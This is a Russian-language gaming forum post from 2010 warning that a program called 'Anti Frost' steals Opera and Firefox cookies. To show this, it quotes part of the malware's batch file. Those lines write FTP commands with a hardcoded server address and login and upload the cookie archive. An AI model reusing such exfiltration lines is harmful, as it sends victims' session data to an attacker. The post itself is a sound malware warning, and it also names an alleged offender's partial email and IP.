Пятница, 29.11.2024, 22:31
Point Blank Курган
Главная | Программа Anti Frost - Форум | Регистрация | Вход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: сигерон  
Программа Anti Frost
сигеронДата: Пятница, 13.08.2010, 14:04 | Сообщение # 1
Рядовой
Группа: Администраторы
Сообщений: 12
Репутация: 2
Статус: Offline
Внимание! Данная программа является вредоносной, т.к ворует cookies Ваших браузеров. Если Вы запускали данное ПО - изучите данное сообщение, удалите все следы данного ПО и выполните антивирусную проверку с обновленными базами, смените Ваши пароли

e-mail нарушителя: dimkastrong*****.ru
IP адрес, с которого действовал: 188.114.56.22

Решил скачать и протестировать что же делает на самом деле программа, так как описание было странным и неправдоподобным.
Наверное я мазохист раз тестирую проги на собственной системе на которой работаю =))
При тестировании обнаружилось что программа подключается к ftp серверу.
При углубленном анализе было выявлено что программа создает в папке temp BAT файл следующего содержания:
Цитата
часть кода удалена
echo open 77.221.132.130 > C:\ftp\ftp_cmd.txt
echo USER mascompr agjFcQmAxx >> C:\ftp\ftp_cmd.txt
echo binary >> C:\ftp\ftp_cmd.txt
echo quote PASV >> C:\ftp\ftp_cmd.txt
echo send C:\Antifrost\Antifrost\Antifrost.rar >> C:\ftp\ftp_cmd.txt
echo quit >> C:\ftp\ftp_cmd.txt
ping -n 3 localhost
:end

Для тех кто не понял то это батник копирует куки оперы и мазилы, архивирует их и посылает на фтп сервер.
Автор Тигрь
Не попадайтесь на эту прогу

Прикрепления: 3896128.jpg (7.7 Kb)
 
  • Страница 1 из 1
  • 1
Поиск:

Copyright MyCorp © 2024Сделать бесплатный сайт с uCoz